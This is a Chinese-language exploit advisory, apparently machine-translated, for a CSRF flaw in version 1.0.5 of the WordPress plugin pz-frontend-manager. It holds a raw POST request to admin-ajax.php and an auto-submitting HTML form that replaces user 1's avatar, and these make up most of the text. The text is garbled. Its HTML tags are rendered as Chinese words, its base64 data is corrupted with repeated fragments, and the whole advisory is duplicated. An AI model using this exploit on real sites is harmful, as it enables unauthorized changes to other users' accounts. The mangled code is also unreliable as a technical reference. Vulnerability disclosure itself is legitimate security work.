#漏洞标题: pz-frontend-manager 1.0.5 - CSRF 导致用户配置文件(头像)被篡改
图片
#日期: 2024-07-01
#利用作者: vuln Seeker网络安全团队
#供应商主页: https://wordpress.org/plugins/pz-frontend-manager/
#受影响版本: 1.0.5
#测试环境: Firefox
#联系ME: [email protected]
该插件的部分操作缺少 CSRF 检查,攻击者可借此诱使已登录用户
在不知情的情况下执行非预期的操作(例如修改其他用户的头像)。
概念证明:
POST /wp-admin/admin-ajax.php HTTP/1.1
HOST: LOCALHOST:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
SEC-GPC: 1
Connection: close
cookie: cookie
动作=PZFM_UPLOAD_AVATARIMAGGETATA=数据%3AMAGE%2FPNG%3BBASE64%%2civborw0kggoaaaaaaaaaaAdaaaadcaaaaaaaaaaaaaaa3caaaaaaaaacnsi2aaaaaaaaaaaaaaaaaaaaacxbiwxmaaaaaaaaaaaaaaaaaaaaaaaeqbpsbpsri EAAAB6ELEQVR42RVWO46EMAZNADACY3VAOQMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX%2FBY7BYVTL4Y8QN%2BTEJTHJTY6WXUQ0KKKFOM5WJEEEK2BQUFM5WJEEK%2Bxgus2bxgus2Bxgus2Bxgul NED0LAKLNYQ4XV2XB%2FK%2BJXDTS8MC1%2Bulvqehet5fit7hlfsufqfok3d1lj9vo% 2BQN1SFVJM%2BISCB7S3UO8ZVZC8RRSXJIUQP2N0D%2BSXFNBHXCW9CF34YN2L5JYJWN dIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6J f2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rv D9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JT yU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV YDHNPZ25HDHVYZQA4NWUXYWU0YTJMYME3OGVLZDRMZDHMMZDHMGFJZJZJIZNZYWOWUU4NGY1NDK2Y2RLMJBINWENWQ3NNM5Y2JJJMJMJKMJK4YZRHZRHZRHZRHZRHZWJJJJJJJECJECJECJABJGGGGGINGGIG;
CSRF Exploit:
html
身体
表单='http://localhost:10003/wp-admin/admin-ajax.php'
方法='post'
输入类型='隐藏'名称='action'value='pzfm_upload_avatar' /
输入类型='隐藏'名称='imagedata'
value='data:image/png; base64,ivborw0kggoaaaaaaaaaaadcaaaaaaaaaaa3caaaaacnsi2aaaaaaaaaaaaaaaacxbiwxmaaab5aaaaaaaaaaaaaaeqbpsrieaaaab6eleqvr42r42rvwo46emaznadacy3vao QMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX/BY7BYVTL4Y8QN+TEJTY6WXUQ0KKFOM5WJEEEKT1BSIGU+ K+JXDTS8MC1+ULVQEHET5FIT7HLFSUFQFOK3D1LJ9VO+QN1SFVJM+ISCB7S3UO 8ZVZC8RRSXJIUQP2N0D+SXFNBHXCW9CF34YN2L5JYJWNDIPRZRFQLPVW0+6PCH1 fjgxpp5nl4vzlyea6zoydgzyvk0cmbykmek6thipsxad5/bkh8h/bkh8h/3jgztxpgm9px9px9wdl0ckm1orjie48nswaxq8kww1 ykw1yxlknkfiwjs/ebebxgozgozmmmyz6jf2kjjf2kjjjjf2kjjjjjjjf2 kjjf2 kjjjf22k4nmyz4nmymmyz4nmymmyz4nmymmyz4nmyz4nmyz4nmyz4nmyz4nmyz4f KXR/H67VM/H8EP9SHLYRQFLI24C0SVY0ZLNXGOKNTQJELE/P/MPOV8T3TGZIZIBO7SL7BMON7BMON74NKUQQUQQUJ4XVNMVNMVNMVNMVNMVNMVWINMBJO+YEVDTZLEX5TZLEX5TZLEX5TZLEX5RVD9LU0ZAUXEXUX UXB VJ8H5GYFZZ3WIBKO57RYECYHEEWF+XW+YCT47JKDZI4TPT+LPNDIV9Z34FXNOXF0PHO91YW5MUMEN5MUMEN56AXLPOTG7W9T6T6T63SCQ2K9UOL1SO3BVNROG1SO3BVNROG2JTYU57N 3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV ydhnpz25hdhvyzqa4nwuxywu0ytjmyme3ogvlzdrmzdhmmgfjzjzjiznzywowu4ngy1ndk2rlmjbinwq3nmm5y2 y2 y2jjjjmjk4yzrhzrhzrhzwjjjjjjjjjjecj2gagggggggjabjabjabjrgjrggjrgjrgjrgjrgjrgj of unight
/
输入类型='隐藏'名称='userId'值='1'' /
输入类型='提交'value='提交请求' /
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/身体
/html
提交后,用户 ID 为 1 的用户的个人资料图片将在后台仪表板中被更改。
参考:
图片
#日期: 2024-07-01
#利用作者: vuln Seeker网络安全团队
#供应商主页: https://wordpress.org/plugins/pz-frontend-manager/
#受影响版本: 1.0.5
#测试环境: Firefox
#联系ME: [email protected]
该插件的部分操作缺少 CSRF 检查,攻击者可借此诱使已登录用户
在不知情的情况下执行非预期的操作(例如修改其他用户的头像)。
概念证明:
POST /wp-admin/admin-ajax.php HTTP/1.1
HOST: LOCALHOST:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
SEC-GPC: 1
Connection: close
cookie: cookie
动作=PZFM_UPLOAD_AVATARIMAGGETATA=数据%3AMAGE%2FPNG%3BBASE64%%2civborw0kggoaaaaaaaaaaAdaaaadcaaaaaaaaaaaaaaa3caaaaaaaaacnsi2aaaaaaaaaaaaaaaaaaaaacxbiwxmaaaaaaaaaaaaaaaaaaaaaaaeqbpsbpsri EAAAB6ELEQVR42RVWO46EMAZNADACY3VAOQMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX%2FBY7BYVTL4Y8QN%2BTEJTHJTY6WXUQ0KKKFOM5WJEEEK2BQUFM5WJEEK%2Bxgus2bxgus2Bxgus2Bxgul NED0LAKLNYQ4XV2XB%2FK%2BJXDTS8MC1%2Bulvqehet5fit7hlfsufqfok3d1lj9vo% 2BQN1SFVJM%2BISCB7S3UO8ZVZC8RRSXJIUQP2N0D%2BSXFNBHXCW9CF34YN2L5JYJWN dIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6J f2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rv D9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JT yU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV YDHNPZ25HDHVYZQA4NWUXYWU0YTJMYME3OGVLZDRMZDHMMZDHMGFJZJZJIZNZYWOWUU4NGY1NDK2Y2RLMJBINWENWQ3NNM5Y2JJJMJMJKMJK4YZRHZRHZRHZRHZRHZWJJJJJJJECJECJECJABJGGGGGINGGIG;
CSRF Exploit:
html
身体
表单='http://localhost:10003/wp-admin/admin-ajax.php'
方法='post'
输入类型='隐藏'名称='action'value='pzfm_upload_avatar' /
输入类型='隐藏'名称='imagedata'
value='data:image/png; base64,ivborw0kggoaaaaaaaaaaadcaaaaaaaaaaa3caaaaacnsi2aaaaaaaaaaaaaaaacxbiwxmaaab5aaaaaaaaaaaaaaeqbpsrieaaaab6eleqvr42r42rvwo46emaznadacy3vao QMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX/BY7BYVTL4Y8QN+TEJTY6WXUQ0KKFOM5WJEEEKT1BSIGU+ K+JXDTS8MC1+ULVQEHET5FIT7HLFSUFQFOK3D1LJ9VO+QN1SFVJM+ISCB7S3UO 8ZVZC8RRSXJIUQP2N0D+SXFNBHXCW9CF34YN2L5JYJWNDIPRZRFQLPVW0+6PCH1 fjgxpp5nl4vzlyea6zoydgzyvk0cmbykmek6thipsxad5/bkh8h/bkh8h/3jgztxpgm9px9px9wdl0ckm1orjie48nswaxq8kww1 ykw1yxlknkfiwjs/ebebxgozgozmmmyz6jf2kjjf2kjjjjf2kjjjjjjjf2 kjjf2 kjjjf22k4nmyz4nmymmyz4nmymmyz4nmymmyz4nmyz4nmyz4nmyz4nmyz4nmyz4f KXR/H67VM/H8EP9SHLYRQFLI24C0SVY0ZLNXGOKNTQJELE/P/MPOV8T3TGZIZIBO7SL7BMON7BMON74NKUQQUQQUJ4XVNMVNMVNMVNMVNMVNMVWINMBJO+YEVDTZLEX5TZLEX5TZLEX5TZLEX5RVD9LU0ZAUXEXUX UXB VJ8H5GYFZZ3WIBKO57RYECYHEEWF+XW+YCT47JKDZI4TPT+LPNDIV9Z34FXNOXF0PHO91YW5MUMEN5MUMEN56AXLPOTG7W9T6T6T63SCQ2K9UOL1SO3BVNROG1SO3BVNROG2JTYU57N 3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV ydhnpz25hdhvyzqa4nwuxywu0ytjmyme3ogvlzdrmzdhmmgfjzjzjiznzywowu4ngy1ndk2rlmjbinwq3nmm5y2 y2 y2jjjjmjk4yzrhzrhzrhzwjjjjjjjjjjecj2gagggggggjabjabjabjrgjrggjrgjrgjrgjrgjrgj of unight
/
输入类型='隐藏'名称='userId'值='1'' /
输入类型='提交'value='提交请求' /
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/身体
/html
提交后,用户 ID 为 1 的用户的个人资料图片将在后台仪表板中被更改。